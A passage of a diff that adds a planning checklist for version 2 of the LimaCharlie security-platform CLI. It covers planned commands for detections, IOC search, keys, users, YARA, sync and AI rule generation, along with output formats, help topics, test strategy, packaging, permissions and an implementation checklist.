+- [ ] `search interactive [--limit-events <n>] [--limit-evals <n>] [--format <table|json>]` - Interactive REPL shell for LCQL queries with history, help, and inline results
+
+### IOC Search Commands - `limacharlie ioc`
+- [ ] `ioc search <type> <value> [--case-sensitive] [--wildcards] [--limit <n>]` - Search for IOC (type: domain, ip, file_hash, file_path, file_name, user, service_name, package_name, hostname)
+- [ ] `ioc batch-search --input-file <file>` - Batch IOC search from file
+- [ ] `ioc hosts <hostname-prefix>` - Find sensors by hostname
+- [ ] `ioc enrich <type> <value>` - Get enrichment info for an indicator (object information lookup)
+- [ ] `ioc batch-enrich --input-file <file>` - Batch enrichment lookup from file
+
+### Event Commands - `limacharlie event`
+- [ ] `event list --sensor <sid> --start <time> --end <time> [--event-type <type>] [--limit <n>] [--forward]` - Get historical events for sensor
+- [ ] `event get --atom <atom>` - Get event by atom
+- [ ] `event children --atom <atom>` - Get child events of an atom
+- [ ] `event overview --sensor <sid> --start <time> --end <time>` - Get event overview
+- [ ] `event timeline --sensor <sid> --start <time> --end <time> [--bucket <day|hour>] [--types <t1,t2>]` - Get event timeline
+- [ ] `event types [--platform <plat>]` - List available event types with schemas
+- [ ] `event schema <event-type>` - Get schema for specific event type
+- [ ] `event retention --start <time> --end <time> [--sensor <sid>] [--detailed]` - Get event retention stats
+
+### Detection Commands - `limacharlie detection`
+- [ ] `detection list --start <time> --end <time> [--category <cat>] [--limit <n>]` - List detections in time range
+- [ ] `detection get <detection-id>` - Get detection by ID
+- [ ] `detection list --sensor <sid> --start <time> --end <time>` - Get detections for specific sensor
+
+### Extension Commands - `limacharlie extension`
+- [ ] `extension list` - List subscribed extensions
+- [ ] `extension list-available` - List all available extensions
+- [ ] `extension subscribe <name>` - Subscribe to extension
+- [ ] `extension unsubscribe <name>` - Unsubscribe from extension
+- [ ] `extension rekey <name>` - Rotate extension API key
+- [ ] `extension schema <name>` - Get extension configuration schema
+- [ ] `extension request <name> --action <action> [--data <json>]` - Call extension
+- [ ] `extension config list` - List extension configurations (from extension_config hive)
+- [ ] `extension config get <name>` - Get extension config
+- [ ] `extension config set <name> --data <json-or-file>` - Set extension config
+- [ ] `extension config delete <name>` - Delete extension config
+- [ ] `extension convert-rules <name> [--dry-run]` - Convert/migrate D&R rules for use with an extension
+
+### Installation Key Commands - `limacharlie installation-key`
+- [ ] `installation-key list` - List installation keys
+- [ ] `installation-key get <iid>` - Get key details
+- [ ] `installation-key create --description <desc> [--tags <t1,t2>] [--use-public-ca]` - Create key
+- [ ] `installation-key delete <iid>` - Delete key
+
+### Ingestion Key Commands - `limacharlie ingestion-key`
+- [ ] `ingestion-key list` - List ingestion keys
+- [ ] `ingestion-key create <name>` - Create key
+- [ ] `ingestion-key delete <name>` - Delete key
+- [ ] `ingestion-key configure <name> [--parse-hint <hint>] [--format-re <regex>]` - Configure USP on key
+
+### User Commands - `limacharlie user`
+- [ ] `user list` - List organization users
+- [ ] `user invite <email> [--emails-file <file>]` - Invite user(s) to organization
+- [ ] `user remove <email>` - Remove user from organization
+- [ ] `user permissions list` - List user permissions
+- [ ] `user permissions add <email> <permission>` - Grant permission
+- [ ] `user permissions remove <email> <permission>` - Revoke permission
+- [ ] `user permissions set-role <email> <role>` - Set user role (owner, admin, operator, viewer, basic)
+
+### Group Commands - `limacharlie group` (NEW)
+- [ ] `group list [--detailed]` - List organization groups
+- [ ] `group get <gid>` - Get group details
+- [ ] `group create <name>` - Create group
+- [ ] `group delete <gid>` - Delete group
+- [ ] `group member add <gid> <email>` - Add member to group
+- [ ] `group member remove <gid> <email>` - Remove member
+- [ ] `group owner add <gid> <email>` - Add owner
+- [ ] `group owner remove <gid> <email>` - Remove owner
+- [ ] `group permissions set <gid> --permissions <p1,p2,...>` - Set group permissions
+- [ ] `group org add <gid> <oid>` - Add org to group
+- [ ] `group org remove <gid> <oid>` - Remove org from group
+- [ ] `group logs <gid>` - Get group audit logs
+
+### API Key Commands - `limacharlie api-key`
+- [ ] `api-key list` - List API keys
+- [ ] `api-key create <name> --permissions <p1,p2,...> [--ip-range <cidr>]` - Create API key
+- [ ] `api-key delete <key-hash>` - Delete API key
+
+### Billing Commands - `limacharlie billing`
+- [ ] `billing status` - Get billing status (is past due?)
+- [ ] `billing details` - Get full billing details
+- [ ] `billing invoice <year> <month> [--format pdf|csv]` - Get invoice URL
+- [ ] `billing plans` - List available plans
+- [ ] `billing skus` - Get SKU definitions
+
+### Stream Commands - `limacharlie stream`
+- [ ] `stream events [--investigation-id <id>] [--tag <tag>] [--category <cat>] [--sensor <sid>]` - Stream events in real-time (Spout)
+- [ ] `stream detections [--investigation-id <id>] [--tag <tag>] [--category <cat>]` - Stream detections
+- [ ] `stream audit` - Stream audit logs
+- [ ] `stream --firehose --listen <ip:port> [--tls-cert <path> --tls-key <path>]` - Start firehose listener
+
+### Replay Commands - `limacharlie replay`
+- [ ] `replay run <rule-name-or-file> --start <time> --end <time> [--sid <sid>] [--selector <bexpr>] [--stream <type>] [--trace] [--dry-run] [--limit-events <n>] [--limit-evals <n>]` - Replay D&R rule against historical data
+
+### Integrity Commands - `limacharlie integrity`
+- [ ] `integrity list` - List integrity monitoring rules
+- [ ] `integrity get <name>` - Get rule details
+- [ ] `integrity create <name> --patterns <p1,p2> [--tags <t1,t2>] [--platforms <plats>]` - Create rule
+- [ ] `integrity delete <name>` - Delete rule
+
+### Exfil Commands - `limacharlie exfil`
+- [ ] `exfil list` - List exfil prevention rules
+- [ ] `exfil create-watch <name> --event <type> --value <val> --operator <op> --path <path> [--tags <t1,t2>] [--platforms <plats>]` - Create watch rule
+- [ ] `exfil create-event <name> --events <e1,e2> [--tags <t1,t2>] [--platforms <plats>]` - Create event-based rule
+- [ ] `exfil delete <name>` - Delete exfil rule
+
+### Logging Commands - `limacharlie logging`
+- [ ] `logging list` - List log collection rules
+- [ ] `logging get <name>` - Get log collection rule details
+- [ ] `logging create <name> --patterns <p1,p2> [--tags <t1,t2>] [--platforms <plats>] [--retention-days <n>] [--delete-after]` - Create log collection rule
+- [ ] `logging delete <name>` - Delete log collection rule
+
+### YARA Commands - `limacharlie yara`
+- [ ] `yara scan <sid> --rule <yara-rule-or-file> [--timeout <secs>]` - Ad-hoc YARA scan on a sensor
+- [ ] `yara rules list` - List active YARA scanning rules
+- [ ] `yara rules add <name> --sources <s1,s2> [--tags <t1,t2>] [--platforms <plats>]` - Add YARA scanning rule
+- [ ] `yara rules delete <name>` - Delete YARA scanning rule
+- [ ] `yara sources list` - List YARA signature sources
+- [ ] `yara sources get <name>` - Get a YARA source definition
+- [ ] `yara sources add <name> --source <url-or-file>` - Add YARA signature source
+- [ ] `yara sources delete <name>` - Delete YARA signature source
+
+### Sync (IaC) Commands - `limacharlie sync`
+- [ ] `sync pull [--rules] [--fps] [--outputs] [--integrity] [--exfil] [--logging] [--artifacts] [--extensions] [--org-configs] [--hives <h1,h2>] [--installation-keys] [--yara] [--all] --output-file <path>` - Download current config
+- [ ] `sync push --input-file <path> [--rules] [--fps] [--outputs] [--integrity] [--exfil] [--logging] [--artifacts] [--extensions] [--org-configs] [--hives <h1,h2>] [--installation-keys] [--yara] [--all] [--force] [--dry-run]` - Upload config
+- [ ] `sync diff --input-file <path> [--rules] [--fps] [--all]` - Show diff between local and remote
+
+### AI Generation Commands - `limacharlie ai` (NEW)
+- [ ] `ai generate-rule <description>` - Generate complete D&R rule from natural language
+- [ ] `ai generate-detection <description>` - Generate detection component only
+- [ ] `ai generate-response <description>` - Generate response component only
+- [ ] `ai generate-query <description> [--start <time> --end <time>]` - Generate LCQL query from natural language
+- [ ] `ai generate-selector <description>` - Generate sensor selector expression
+- [ ] `ai generate-playbook <description>` - Generate Python playbook
+- [ ] `ai summarize-detection --detection-id <id>` - Summarize a detection
+
+### Investigation Commands - `limacharlie investigation` (NEW)
+- [ ] `investigation list` - List investigations
+- [ ] `investigation get <id>` - Get investigation details
+- [ ] `investigation create --data <json-or-file>` - Create investigation
+- [ ] `investigation update <id> --data <json-or-file>` - Update investigation
+- [ ] `investigation delete <id>` - Delete investigation
+- [ ] `investigation expand <id> --sensor <sid> [--events <json>]` - Expand investigation timeline
+
+### USP Commands - `limacharlie usp`
+- [ ] `usp validate --platform <plat> [--mapping <json-or-file>] [--mappings-file <file>] [--input <data-or-file>] [--hostname <h>] [--indexing-file <file>]` - Validate USP adapter configuration
+
+### Secret Commands - `limacharlie secret` (NEW - shortcuts for hive/secret)
+- [ ] `secret list` - List secrets
+- [ ] `secret get <name>` - Get secret value
+- [ ] `secret set <name> --value <val>` - Set secret
+- [ ] `secret delete <name>` - Delete secret
+
+### Lookup Commands - `limacharlie lookup` (NEW - shortcuts for hive/lookup)
+- [ ] `lookup list` - List lookups
+- [ ] `lookup get <name>` - Get lookup data
+- [ ] `lookup set <name> --data <json-or-file>` - Create/update lookup
+- [ ] `lookup query <name> --value <val>` - Query a lookup table by value
+- [ ] `lookup delete <name>` - Delete lookup
+
+### Playbook Commands - `limacharlie playbook` (NEW - shortcuts for hive/playbook)
+- [ ] `playbook list` - List playbooks
+- [ ] `playbook get <name>` - Get playbook
+- [ ] `playbook set <name> --data <json-or-file>` - Create/update playbook
+- [ ] `playbook delete <name>` - Delete playbook
+
+### Adapter Commands - `limacharlie adapter` (NEW - shortcuts for external adapters)
+- [ ] `adapter list` - List external adapters
+- [ ] `adapter get <name>` - Get adapter config
+- [ ] `adapter set <name> --data <json-or-file>` - Create/update adapter
+- [ ] `adapter delete <name>` - Delete adapter
+
+### Cloud Sensor Commands - `limacharlie cloud-sensor` (NEW - shortcuts for hive/cloud_sensor)
+- [ ] `cloud-sensor list` - List cloud sensor configurations (S3, GCS, etc.)
+- [ ] `cloud-sensor get <name>` - Get cloud sensor config
+- [ ] `cloud-sensor set <name> --data <json-or-file>` - Create/update cloud sensor
+- [ ] `cloud-sensor delete <name>` - Delete cloud sensor
+
+### SOP Commands - `limacharlie sop` (NEW)
+- [ ] `sop list` - List SOPs
+- [ ] `sop get <name>` - Get SOP
+- [ ] `sop set <name> --data <json-or-file>` - Create/update SOP
+- [ ] `sop delete <name>` - Delete SOP
+
+### Note Commands - `limacharlie note` (NEW)
+- [ ] `note list` - List org notes
+- [ ] `note get <name>` - Get note
+- [ ] `note set <name> --data <json-or-file>` - Create/update note
+- [ ] `note delete <name>` - Delete note
+
+### ARL Commands - `limacharlie arl`
+- [ ] `arl get <arl-url>` - Resolve and fetch data from an Authenticated Resource Locator (ARL)
+
+### Job Commands - `limacharlie job`
+- [ ] `job list` - List service/replicant jobs
+- [ ] `job get <job-id>` - Get job details and status
+- [ ] `job wait <job-id> [--timeout <secs>]` - Wait for job to finish, printing status updates
+- [ ] `job delete <job-id>` - Cancel/delete a job
+
+### Audit Commands - `limacharlie audit`
+- [ ] `audit list --start <time> --end <time> [--limit <n>] [--event-type <type>] [--sensor <sid>]` - Get audit logs
+
+### SpotCheck Commands - `limacharlie spotcheck`
+- [ ] `spotcheck run --config <json-or-file>` - Run concurrent IOC spot checks
+
+### Help & Discovery Commands - `limacharlie help` / `limacharlie discover`
+- [ ] `limacharlie discover` - List all commands grouped by profile/use-case
+- [ ] `limacharlie discover --profile <profile>` - List commands for a specific profile (sensor_management, detection_engineering, historical_data, live_investigation, threat_response, fleet_management, platform_admin, ai_powered)
+- [ ] `limacharlie help <topic>` - Concept guides (topics: d&r-rules, hive, lcql, sensors, outputs, extensions, sync, auth, permissions, events, detections, adapters, platform-codes, ioc-types, timestamps)
+- [ ] `limacharlie cheatsheet <topic>` - Quick reference with copy-paste examples
+- [ ] `limacharlie schema <command>` - JSON Schema for command parameters
+- [ ] Any command with `--explain` - Detailed description of what the command does
+
+---
+
+## 6. Output & Formatting
+
+### 6.1 Output Modes
+- [ ] `--output table` (default for TTY) - Rich tables with borders and colors
+- [ ] `--output json` (default for pipes) - Pretty-printed JSON
+- [ ] `--output yaml` - YAML format
+- [ ] `--output csv` - CSV with headers
+- [ ] `--output jsonl` - One JSON object per line (for streaming)
+- [ ] Auto-detection: use `json` when stdout is not a TTY
+
+### 6.2 Filtering & Transformation
+- [ ] `--filter <jmespath>` - JMESPath expression for filtering/transforming output
+- [ ] `--fields <f1,f2,f3>` - Select specific fields to display
+- [ ] `--sort-by <field>` - Sort results by field
+- [ ] `--reverse` - Reverse sort order
+
+### 6.3 Progress & Status
+- [ ] Progress bars for long-running operations (upload, search, replay)
+- [ ] Status spinners for operations in progress
+- [ ] Suppress progress with `--quiet`
+
+---
+
+## 7. AI/LLM Discoverability Features
+
+### 7.1 Concept Help System
+- [ ] Embedded help for every LimaCharlie concept
+- [ ] Each help topic includes: what it is, when to use it, how it relates to other concepts, examples
+- [ ] Topics auto-linked (e.g., "See also: `limacharlie help hive`")
+
+### 7.2 Rich Help Text Content
+
+The following help topics should be embedded in the CLI and available via `limacharlie help <topic>` (check ../documentation to better understand):
+
+- [ ] **d&r-rules**: What D&R rules are, namespaces (general/managed/service), rule structure (detect + respond), operators (is, contains, matches, and, or, etc.), common patterns, testing with replay, lifecycle
+- [ ] **hive**: What hives are, available hive types and what each stores, record structure (data + usr_mtd), etag for transactions, ARL for remote data, partition keys, common operations
+- [ ] **lcql**: LCQL query syntax (5 components: timeframe, sensors, events, filter, projection), operators (comparison, string, pattern, network, scope), field selectors, common query examples, billing implications
+- [ ] **sensors**: Sensor lifecycle, platforms (windows, linux, macos, chrome), architecture types, sensor selectors (bexpr syntax), installation keys, online/offline, isolation, tagging, tasking
+- [ ] **outputs**: Output types (S3, GCS, Syslog, Webhook, Slack, SMTP, Kafka, Elastic, DataDog, etc.), data types (event, detect, audit, deployment, artifact, tailored, billing), configuration options
+- [ ] **extensions**: What extensions are, subscribing/unsubscribing, extension configs, schemas, requesting actions
+- [ ] **sync**: Infrastructure-as-Code with LimaCharlie, push/pull/diff workflow, component selection, force mode, dry-run, file format
+- [ ] **auth**: Authentication methods (API key, OAuth, JWT), credential storage, environments/profiles, permission model, roles (owner, admin, operator, viewer, basic)
+- [ ] **permissions**: Full list of permissions (org.get, sensor.task, dr.set, etc.) with descriptions of what each grants
+- [ ] **events**: Event types available in LimaCharlie, event structure (routing + event), atoms and event trees, retention, event schemas
+- [ ] **detections**: How D&R rules generate detections, detection categories, detection lifecycle, false positives
+- [ ] **adapters**: External adapters, cloud sensors, USP (Universal Sensor Protocol), adapter types and configuration
+- [ ] **platform-codes**: Platform identifiers (windows=268435456, linux=536870912, macos=805306368, etc.) and when they're used
+- [ ] **ioc-types**: IOC types supported (domain, ip, file_hash, file_path, file_name, user, service_name, package_name, hostname) with examples
+- [ ] **timestamps**: Timestamp conventions (API=seconds, events=milliseconds), conversion rules, time range formats
+- [ ] **bexpr**: Sensor selector expression syntax (bexpr), available fields (sid, oid, plat, arch, hostname, int_ip, ext_ip, alive, tags), operators (==, !=, in, matches, contains), examples
+- [ ] **billing**: Billing model, SKU types, usage metrics, quota management
+
+### 7.3 Command Explain System
+- [ ] Every command supports `--explain` flag
+- [ ] Explain output includes: purpose, when to use, related commands, examples, common pitfalls
+- [ ] Example: `limacharlie rule create --explain` prints a multi-paragraph guide about creating D&R rules
+
+### 7.4 Profile-Based Discovery
+- [ ] `limacharlie discover --profile sensor_management` - Sensor lifecycle commands
+- [ ] `limacharlie discover --profile detection_engineering` - Rule creation, testing, deployment commands
+- [ ] `limacharlie discover --profile historical_data` - Search, LCQL, event queries
+- [ ] `limacharlie discover --profile live_investigation` - Sensor tasking, process/network inspection
+- [ ] `limacharlie discover --profile threat_response` - Isolation, tagging, sensor management during incidents
+- [ ] `limacharlie discover --profile fleet_management` - Installation keys, deployment, upgrades
+- [ ] `limacharlie discover --profile platform_admin` - Users, groups, API keys, billing, outputs
+- [ ] `limacharlie discover --profile ai_powered` - AI generation commands
+
+### 7.5 Error Messages with Guidance
+- [ ] Every error message includes a "Suggestion:" line
+- [ ] Example: `Error: OID not set. Suggestion: Run 'limacharlie auth use-org <oid>' or set LC_OID environment variable`
+- [ ] Example: `Error: Permission denied (missing 'dr.set'). Suggestion: Ask your org admin to grant 'dr.set' permission, or create a new API key with 'limacharlie api-key create'`
+- [ ] Example: `Error: Rate limited. Suggestion: Wait 10 seconds and retry, or use --retry flag for automatic retry`
+
+---
+
+## 8. Testing Strategy
+
+### 8.1 Test Framework
+- [ ] pytest as test runner
+- [ ] pytest-asyncio for async tests
+- [ ] pytest-cov for coverage reporting
+- [ ] responses library for HTTP mocking in unit tests
+- [ ] click.testing.CliRunner for CLI command testing
+
+### 8.2 Unit Tests
+All unit tests should be runnable without credentials or network access.
+
+- [ ] **test_cli_commands.py** - Test every CLI command's argument parsing, help text, and error handling using CliRunner
+- [ ] **test_config.py** - Test credential resolution order, environment handling, ephemeral mode, file I/O
+- [ ] **test_client.py** - Test HTTP client retry logic, JWT refresh, rate limit handling, request formatting (mocked)
+- [ ] **test_output.py** - Test all output formatters (json, yaml, csv, table, jsonl), field selection, filtering, sorting
+- [ ] **test_errors.py** - Test error hierarchy, error messages with suggestions, exit codes
+- [ ] **test_sdk_organization.py** - Test Organization class methods with mocked HTTP responses
+- [ ] **test_sdk_sensor.py** - Test Sensor class methods with mocked HTTP
+- [ ] **test_sdk_dr_rules.py** - Test D&R rule CRUD with mocked HTTP, namespace handling, validation
+- [ ] **test_sdk_hive.py** - Test Hive operations with mocked HTTP, etag transactions, batch operations
+- [ ] **test_sdk_search.py** - Test Search/LCQL with mocked HTTP, pagination, saved queries
+- [ ] **test_sdk_configs.py** - Test Configs sync with mocked HTTP, diff generation
+- [ ] **test_discovery.py** - Test help system, explain mode, profile-based discovery
+- [ ] **test_help_topics.py** - Ensure all help topics are valid, complete, and don't reference missing commands
+
+### 8.3 Integration Tests
+All integration tests use a real LimaCharlie org (credentials via `--oid` and `--key` pytest options). Every test must **clean up** after itself, including on failure, to ensure the test org stays in a known state.
+
+**Test pattern**: Setup -> Action -> Assert -> **Cleanup in finally block**
+
+- [ ] **test_auth.py**
+  - Test `auth whoami` returns valid identity
+  - Test `auth test --permissions org.get,sensor.list` succeeds
+  - Test `auth list-orgs` returns at least one org
+
+- [ ] **test_sensor.py**
+  - Test `sensor list` returns sensors (if any online)
+  - Test `sensor list --selector 'plat == \`windows\`'` filters correctly
+  - Test `sensor get <sid>` returns valid sensor info
+  - Test `tag add/remove` cycle on a sensor
+  - Test `tag list` returns tags for org
+  - Test network isolation and rejoin cycle (on compatible sensor)
+
+- [ ] **test_rules.py**
+  - Test create D&R rule -> verify exists -> delete -> verify gone
+  - Test create rule in managed namespace -> verify -> delete
+  - Test create rule with --replace flag
+  - Test create rule with --ttl flag
+  - Test create rule from --input-file (YAML)
+  - Test rule validate succeeds for valid rule and fails for invalid
+  - Test rule replay against historical data (if data exists)
+  - Test rule export/import round-trip
+
+- [ ] **test_hive.py**
+  - Test CRUD lifecycle: set -> get -> validate -> rename -> delete
+  - Test set with metadata (enabled, tags, comment, expiry)
+  - Test etag-based transaction (set -> modify with etag -> verify)
+  - Test different hive types: dr-general, cloud_sensor, lookup
+  - Test hive list returns correct records
+  - Test export/import round-trip
+
+- [ ] **test_outputs.py**
+  - Test create syslog output -> verify in list -> delete -> verify gone
+  - Test output with various modules (syslog, webhook, etc.)
+
+- [ ] **test_artifacts.py**
+  - Test upload small file -> verify upload succeeded
+  - Test artifact list (verify uploaded artifact appears)
+  - (Cleanup: artifacts auto-expire, but verify cleanup logic)
+
+- [ ] **test_search.py**
+  - Test search validate with valid LCQL
+  - Test search validate with invalid LCQL (expect error)
+  - Test search estimate returns billing info
+  - Test search run returns results (if data exists)
+  - Test saved query lifecycle: create -> list -> get -> run -> delete
+
+- [ ] **test_extensions.py**
+  - Test extension list returns subscribed extensions
+  - (Note: subscribe/unsubscribe may have billing implications - test carefully)
+
+- [ ] **test_users.py**
+  - Test user list returns at least one user
+  - Test user permissions list returns permissions
+  - (Note: invite/remove are destructive - test with care)
+
+- [ ] **test_api_keys.py**
+  - Test api-key list returns at least one key
+  - Test create key -> verify in list -> delete -> verify gone
+  - Test create key with specific permissions
+  - Test create key with IP range restriction
+
+- [ ] **test_installation_keys.py**
+  - Test installation-key list
+  - Test create -> get -> delete lifecycle
+  - Test create with tags and description
+
+- [ ] **test_ingestion_keys.py**
+  - Test ingestion-key list
+  - Test create -> list -> delete lifecycle
+
+- [ ] **test_sync.py**
+  - Test sync pull downloads config
+  - Test sync push with dry-run shows expected changes
+  - Test sync push/pull round-trip for rules
+  - Test sync push with force for hive
+  - Test sync diff shows correct differences
+
+- [ ] **test_replay.py**
+  - Test replay with inline rule
+  - Test replay with trace output
+  - Test replay dry-run
+
+- [ ] **test_stream.py**
+  - Test spout connection for events (connect, receive 1 event or timeout, disconnect)
+  - Test spout with filter (tag or category)
+
+- [ ] **test_ai.py**
+  - Test ai generate-query with simple description
+  - Test ai generate-detection with simple description
+  - (Note: AI endpoints have rate limits - test sparingly)
+
+- [ ] **test_billing.py**
+  - Test billing status returns valid response
+  - Test billing plans returns available plans
+
+- [ ] **test_groups.py**
+  - Test group list
+  - Test group create -> get -> delete lifecycle
+  - (Note: group membership tests need careful cleanup)
+
+- [ ] **test_org_management.py**
+  - Test org info returns valid data
+  - Test org config get
+  - Test org urls returns URLs
+  - Test org stats returns usage data
+  - Test org errors returns error list (may be empty)
+  - Test org mitre-report returns report data
+
+- [ ] **test_usp.py**
+  - Test usp validate with valid mapping
+  - Test usp validate with invalid mapping (expect error details)
+
+- [ ] **test_integrity.py**
+  - Test integrity rule lifecycle: create -> list -> get -> delete
+
+- [ ] **test_exfil.py**
+  - Test exfil rule lifecycle: create watch -> list -> delete
+  - Test exfil rule lifecycle: create event -> list -> delete
+
+- [ ] **test_logging.py**
+  - Test logging rule lifecycle: create -> list -> get -> delete
+  - Test create with patterns, retention, and platforms
+
+- [ ] **test_yara.py**
+  - Test yara sources list
+  - Test yara source add -> list -> delete lifecycle
+  - Test yara rules list
+  - Test yara rule add -> list -> delete lifecycle
+  - Test yara scan on an online sensor (if available)
+
+- [ ] **test_jobs.py**
+  - Test job list returns valid response
+  - Test job get for a known job (created by replay or other service)
+
+- [ ] **test_cli_e2e.py**
+  - End-to-end test using subprocess to invoke actual CLI
+  - Test `limacharlie --version`
+  - Test `limacharlie discover` output contains expected profiles
+  - Test `limacharlie help d&r-rules` returns non-empty help
+  - Test `limacharlie org info --output json` returns valid JSON
+  - Test `limacharlie sensor list --output json` returns valid JSON array
+  - Test piping: `limacharlie sensor list --output json | limacharlie --input-json ...` (if applicable)
+
+### 8.4 Test Fixtures & Cleanup
+- [ ] `conftest.py` with shared fixtures:
+  - `lc_client` fixture that creates authenticated Client
+  - `lc_org` fixture that creates Organization
+  - `unique_name()` helper that generates unique test names with prefix `test-cli-v2-`
+  - `cleanup` fixture that tracks created resources and deletes them in teardown
+  - Automatic cleanup on fixture teardown (even on assertion failure)
+- [ ] All test names prefixed to avoid collision with other tests
+- [ ] Tests are idempotent (can be re-run without manual cleanup)
+- [ ] Each test creates its own resources and cleans up after
+
+### 8.5 Test CI Configuration
+- [ ] Update `cloudbuild.yaml` to run v2 tests
+- [ ] Unit tests: `pytest tests/unit/ -v`
+- [ ] Integration tests: `pytest tests/integration/ -v --oid=$OID --key=$KEY`
+- [ ] Can run locally with `LC_OID` and `LC_API_KEY` env vars
+
+---
+
+## 9. Migration & Packaging
+
+### 9.1 Package Structure
+- [ ] Package name remains `limacharlie`
+- [ ] Version bumped to `2.0.0`
+- [ ] v2 code replaces v1 code directly in `limacharlie/` package
+- [ ] Entry point `limacharlie` runs Click-based CLI
+- [ ] No legacy v1 entry point (clean break)
+
+### 9.2 Dependencies
+- [ ] `click` - CLI framework
+- [ ] `requests` - HTTP client
+- [ ] `websocket-client` - WebSocket for Spout
+- [ ] `pyyaml` - YAML support
+- [ ] `tabulate` - Table output
+- [ ] `jmespath` - Output filtering
+- [ ] `rich` - Rich terminal output (progress bars, spinners, tables)
+- [ ] `typing-extensions` - Type annotation support
+
+### 9.3 Python Version Support
+- [ ] Python 3.9+
+- [ ] Type annotations throughout (for IDE support and documentation)
+
+---
+
+## 10. Detailed Command Reference
+
+### 10.1 Time Format Specification
+
+All `--start` and `--end` parameters accept:
+- **Relative**: `-1h`, `-24h`, `-720h` (30 days), `-1h30m`
+- **Absolute**: `2025-01-15T00:00:00Z`, `2025-01-15`
+- **Unix timestamp**: `1705276800` (seconds), `1705276800000` (milliseconds, auto-detected)
+- **Note**: Days (`d`) should also be supported as shorthand: `-7d` = `-168h`
+
+### 10.2 Common Flag Conventions
+
+| Flag | Type | Description |
+|------|------|-------------|
+| `--oid` | UUID | Organization ID (overrides default) |
+| `--sid` | UUID | Sensor ID |
+| `--name` | string | Resource name |
+| `--output` | enum | Output format: json, yaml, csv, table, jsonl |
+| `--input-file` | path | Read input from JSON or YAML file |
+| `--filter` | jmespath | JMESPath expression for filtering output |
+| `--fields` | csv | Comma-separated list of fields to display |
+| `--limit` | int | Maximum number of results |
+| `--offset` | int | Pagination offset |
+| `--confirm` | flag | Required for destructive operations |
+| `--dry-run` | flag | Simulate without making changes |
+| `--debug` | flag | Show request/response debug info |
+| `--quiet` / `-q` | flag | Suppress non-error output |
+| `--explain` | flag | Print detailed command explanation |
+| `--retry` | flag | Auto-retry on rate limits |
+
+### 10.3 Sensor Selector Syntax (bexpr)
+
+Used in `--selector` parameter for commands like `sensor list`, `tag mass-add`, `rule replay`:
+
+```
+plat == `windows`                    # Windows sensors
+`production` in tags                 # Sensors with 'production' tag
+hostname matches `^web-`             # Hostname starts with 'web-'
+int_ip == `10.0.0.1`               # Internal IP match
+ext_ip matches `^192\\.168\\.`     # External IP pattern
+arch == `x64`                       # 64-bit architecture
+plat == `windows` and `prod` in tags # Combined filters
+```
+
+Available fields: `sid`, `oid`, `plat`, `arch`, `hostname`, `int_ip`, `ext_ip`, `alive`, `tags`, `os`, `version`, `did`
+
+### 10.4 Permission Reference
+
+Full list of permissions available for API keys and user roles:
+
+| Permission | Description |
+|-----------|-------------|
+| `org.get` | View organization info |
+| `org.set` | Modify organization settings |
+| `sensor.get` | View sensor info |
+| `sensor.list` | List sensors |
+| `sensor.task` | Send tasks to sensors |
+| `sensor.tag` | Manage sensor tags |
+| `dr.list` | List D&R rules |
+| `dr.set` | Create/modify D&R rules |
+| `dr.del` | Delete D&R rules |
+| `dr.list.managed` | List managed D&R rules |
+| `dr.set.managed` | Create/modify managed D&R rules |
+| `dr.del.managed` | Delete managed D&R rules |
+| `output.list` | List outputs |
+| `output.set` | Create/modify outputs |
+| `output.del` | Delete outputs |
+| `ikey.list` | List installation keys |
+| `ikey.set` | Create installation keys |
+| `ikey.del` | Delete installation keys |
+| `ingestkey.ctrl` | Manage ingestion keys |
+| `audit.get` | View audit logs |
+| `fp.ctrl` | Manage false positive rules |
+| `org.conf.get` | View org configuration |
+| `org.conf.set` | Modify org configuration |
+| `user.ctrl` | Manage users |
+| `apikey.ctrl` | Manage API keys |
+| `billing.ctrl` | View billing info |
+| `replicant.get` | List replicants |
+| `replicant.task` | Run replicant tasks |
+| `insight.evt.get` | Query events (Insight) |
+
+---
+
+## 11. Implementation Checklist
+
+### Phase 1: Core Infrastructure
+- [x] Remove v1 modules and create new `limacharlie/` directory structure (sdk/, commands/)
+- [x] Implement `errors.py` - Error hierarchy with suggestion messages
+- [x] Implement `config.py` - Credential resolution, environment management
+- [x] Implement `client.py` - HTTP client with retry, auth, rate limiting
+- [x] Implement `output.py` - All output formatters (json, yaml, csv, table, jsonl)
+- [x] Implement `cli.py` - Main click entry point with global options
+- [x] Implement `discovery.py` - Help topics, explain system, profile-based discovery
+- [x] Write unit tests for all core infrastructure
+
+### Phase 2: SDK Classes
+- [x] Implement `sdk/organization.py` - Organization class
+- [x] Implement `sdk/sensor.py` - Sensor class
+- [x] Implement `sdk/dr_rules.py` - D&R rule operations
+- [x] Implement `sdk/fp_rules.py` - False positive operations
+- [x] Implement `sdk/hive.py` - Hive client with records, batch, transactions
+- [x] Implement `sdk/outputs.py` - Output management
+- [x] Implement `sdk/artifacts.py` - Artifact upload/download with multipart
+- [x] Implement `sdk/payloads.py` - Payload management
+- [x] Implement `sdk/search.py` - LCQL search with pagination
+- [x] Implement `sdk/insight.py` - IOC search, event queries
+- [x] Implement `sdk/extensions.py` - Extension management
+- [x] Implement `sdk/installation_keys.py`
+- [x] Implement `sdk/ingestion_keys.py`
+- [x] Implement `sdk/users.py` - User & permission management
+- [x] Implement `sdk/groups.py` - Group management (NEW)
+- [x] Implement `sdk/api_keys.py` - API key management
+- [x] Implement `sdk/billing.py` - Billing operations
+- [x] Implement `sdk/spout.py` - WebSocket real-time streaming
+- [x] Implement `sdk/firehose.py` - TCP/TLS streaming
+- [x] Implement `sdk/replay.py` - D&R replay
+- [x] Implement `sdk/integrity.py` - Integrity monitoring rules
+- [x] Implement `sdk/exfil.py` - Exfil prevention rules
+- [x] Implement `sdk/logging_rules.py` - Logging rules
+- [x] Implement `sdk/configs.py` - Configuration sync
+- [x] Implement `sdk/ai.py` - AI generation (NEW)
+- [x] Implement `sdk/investigations.py` - Investigation management (NEW)
+- [x] Implement `sdk/usp.py` - USP validation (note: sensor tasking/comms is handled via sdk/sensor.py task methods, no separate comms module needed)
+- [x] Implement `sdk/jobs.py` - Service job tracking
+- [x] Implement `sdk/yara.py` - YARA scanning & rule management
+- [x] Implement `sdk/arl.py` - Authenticated Resource Locator resolution
+- [x] Write unit tests for all SDK classes
+
+### Phase 3: CLI Commands
+- [x] Implement `commands/auth.py` - login, logout, whoami, use-org, test
+- [x] Implement `commands/org.py` - org info, list, create, delete, config, errors, stats, mitre
+- [x] Implement `commands/sensor.py` - sensor list, get, delete, online, wait-online, upgrade, set-version, export, dump, sweep
